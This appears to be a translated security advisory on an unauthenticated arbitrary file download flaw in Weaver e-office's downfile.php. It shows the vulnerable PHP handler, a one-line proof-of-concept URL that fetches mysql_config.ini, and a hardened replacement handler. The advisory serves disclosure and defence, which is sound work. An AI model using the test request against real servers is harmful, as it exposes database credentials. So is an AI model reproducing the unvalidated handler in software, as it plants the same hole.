### Vulnerability information:
Weaver (泛微) e-office is an OA (office automation) product that Weaver offers to small and medium-sized organizations; it is simple, easy to use and efficient, quick to deploy and low in cost, and a free trial is available. To date it has provided a convenient and efficient office experience to more than ten thousand customers.
Weaver e-office has an arbitrary file download vulnerability that leads to sensitive information disclosure.
### Vulnerability analysis:
The vulnerability is in E-mobile/Data/downfile.php:
```php
<?php
// Vulnerable handler as shipped (behaviour preserved; comments added for analysis).
$fileurl = $_REQUEST['url'];
$sessionstr = $_REQUEST['sessionkey'];
$strexplode = explode( ",", $sessionstr );
$sessionkey = $strexplode[0];      // parsed, but never validated below
$curr_user_id = $strexplode[1];    // parsed, but never validated below
$rooturl = "http://".$_SERVER['HTTP_HOST'];
$checkurl = explode( "/", $fileurl );
if ( $checkurl[1] == "flowimg" )
{
$url = $rooturl."/E-mobile/flowimg.php?RUN_ID=".$checkurl[2]."&FLOW_ID=".$checkurl[3];
$type = "png";
}
else if ( $checkurl[1] == "freeflowimg" )
{
$url = $rooturl."/E-mobile/flow/freeflowimg.php?RUN_ID=".$checkurl[2]."&FLOW_ID=".$checkurl[3];
$type = "png";
}
else
{
// Any other value of url is appended to the site root unchanged:
// no path normalisation, no directory restriction, no extension whitelist.
$url = $rooturl.$fileurl;
$filetype = pathinfo( $fileurl );
$type = $filetype['extension'];
}
if ( $type == "css" )
{
header( "Content-Type: text/css" );
}
else if ( $type == "js" )
{
header( "Content-Type: application/javascript" );
}
else if ( $type == "jpg" || $type == "jpeg" || $type == "JPG" || $type == "JPEG" )
{
header( "Content-Type: image/jpeg" );
}
else if ( $type == "png" || $type == "PNG" )
{
header( "Content-Type: image/png" );
}
else if ( $type == "bmp" || $type == "BMP" )
{
header( "Content-Type: image/bmp" );
}
else if ( $type == "gif" || $type == "GIF" )
{
header( "Content-Type: image/gif" );
}
else if ( $type == "pdf" || $type == "PDF" )
{
header( "Content-Type: application/pdf" );
}
else if ( $type == "rar" || $type == "RAR" )
{
header( "Content-Type: application/x-rar-compressed" );
}
else if ( $type == "exe" || $type == "EXE" )
{
header( "Content-Type: application/octet-stream" );
}
else if ( $type == "zip" || $type == "ZIP" )
{
header( "Content-Type: application/zip" );
}
else if ( $type == "doc" || $type == "DOC" )
{
header( "Content-Type: application/msword" );
}
else if ( $type == "docx" || $type == "DOCX" )
{
header( "Content-Type: application/msword" );
}
else if ( $type == "xls" || $type == "XLS" || $type == "csv" || $type == "CSV" )
{
header( "Content-Type: application/vnd.ms-excel" );
}
else if ( $type == "ppt" || $type == "PPT" )
{
header( "Content-Type: application/vnd.ms-powerpoint" );
}
else if ( $type == "txt" || $type == "TXT" )
{
header( "Content-Type: text/plain" );
}
else
{
// Unknown extensions are still served, just with a generic download header.
header( "Content-Type: application/force-download" );
}
// The file is fetched from the local web server over HTTP and echoed verbatim.
$content = file_get_contents( $url );
echo $content;
?>
```
As can be seen, the url parameter is not effectively filtered, so arbitrary files can be downloaded; the sessionkey parameter is split into variables but never checked, so no authentication is required either.
The following URL can be used to test this by downloading a source/configuration file:
```
http://**.**.**.**:8028/E-mobile/Data/downfile.php?url=/mysql_config.ini
```
### Solution:
It is recommended to follow the official website and upgrade to the latest version promptly:
http://www.weaver.com.cn/
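For comparison with the handler analysed above, the following is an added example of how a download endpoint of this shape can be hardened. It is not Weaver's code and not the vendor's fix; it assumes that attachments live under a directory `ATTACH_ROOT` (hypothetical path) and that the logged-in user's id is kept in `$_SESSION['USER_ID']` (hypothetical key). The three changes that matter are: the request is tied to a real server-side session instead of an unchecked `sessionkey` parameter, the `url` value is resolved with `realpath()` and must land strictly inside the attachment root, and only a fixed whitelist of extensions is served from disk, with no fall-through branch and no `file_get_contents()` over HTTP.

```php
<?php
// Added hardened example (not the vendor's code). Assumptions, both hypothetical:
// attachments are stored under ATTACH_ROOT, and the session stores the user id
// in $_SESSION['USER_ID'].
declare(strict_types=1);

const ATTACH_ROOT = '/var/www/eoffice/attachment'; // assumed upload directory

// Only these extensions may be served. Anything else is refused instead of
// falling through to a generic "force-download" branch.
const ALLOWED_TYPES = [
    'css'  => 'text/css',
    'js'   => 'application/javascript',
    'jpg'  => 'image/jpeg',
    'jpeg' => 'image/jpeg',
    'png'  => 'image/png',
    'gif'  => 'image/gif',
    'bmp'  => 'image/bmp',
    'pdf'  => 'application/pdf',
    'txt'  => 'text/plain',
    'zip'  => 'application/zip',
    'doc'  => 'application/msword',
    'docx' => 'application/vnd.openxmlformats-officedocument.wordprocessingml.document',
    'xls'  => 'application/vnd.ms-excel',
    'ppt'  => 'application/vnd.ms-powerpoint',
];

/**
 * Map a user-supplied relative path onto a real file strictly inside $root.
 * Returns the canonical path, or null if the request must be refused.
 */
function resolve_download_path(string $root, string $requested): ?string
{
    // Refuse empty input, embedded NUL bytes and anything carrying a URL
    // scheme, so the handler can never be turned into a fetch of another URL.
    if ($requested === '' || strpos($requested, "\0") !== false) {
        return null;
    }
    if (preg_match('#^[a-z][a-z0-9+.-]*:#i', $requested)) {
        return null;
    }
    $realRoot = realpath($root);
    if ($realRoot === false) {
        return null;
    }
    // realpath() collapses "..", symlinks and repeated separators; a false
    // result means the target does not exist.
    $candidate = realpath($realRoot . DIRECTORY_SEPARATOR . ltrim($requested, '/\\'));
    if ($candidate === false || !is_file($candidate)) {
        return null;
    }
    // Compare against the root WITH a trailing separator so that a sibling
    // directory such as "/attachment_old/x" is not accepted as inside "/attachment".
    $prefix = $realRoot . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $candidate;
}

/** Return the MIME type for a whitelisted extension, or null if it is not allowed. */
function content_type_for(string $path): ?string
{
    $ext = strtolower(pathinfo($path, PATHINFO_EXTENSION));
    return ALLOWED_TYPES[$ext] ?? null;
}

/** Current user id from the server-side session (assumed key), or null if not logged in. */
function current_user_id(): ?string
{
    if (session_status() !== PHP_SESSION_ACTIVE) {
        session_start();
    }
    return isset($_SESSION['USER_ID']) ? (string) $_SESSION['USER_ID'] : null;
}

// --- request handling ---
if (current_user_id() === null) {
    http_response_code(401); // a real session check replaces the unchecked "sessionkey" parameter
    exit;
}
$path = resolve_download_path(ATTACH_ROOT, (string) ($_GET['url'] ?? ''));
$mime = $path !== null ? content_type_for($path) : null;
if ($path === null || $mime === null) {
    http_response_code(404); // same answer for "outside root" and "missing": reveal nothing
    exit;
}
header('Content-Type: ' . $mime);
header('X-Content-Type-Options: nosniff');
header('Content-Disposition: attachment; filename="' . basename($path) . '"');
header('Content-Length: ' . (string) filesize($path));
readfile($path); // serve from disk; never file_get_contents() over HTTP
```

The prefix comparison after `realpath()` is the step that actually closes the traversal: `../`, encoded separators and symlinks are all collapsed before the check, so a request such as `url=/../mysql_config.ini` resolves to a path outside `ATTACH_ROOT` and is refused with the same 404 a missing file would get.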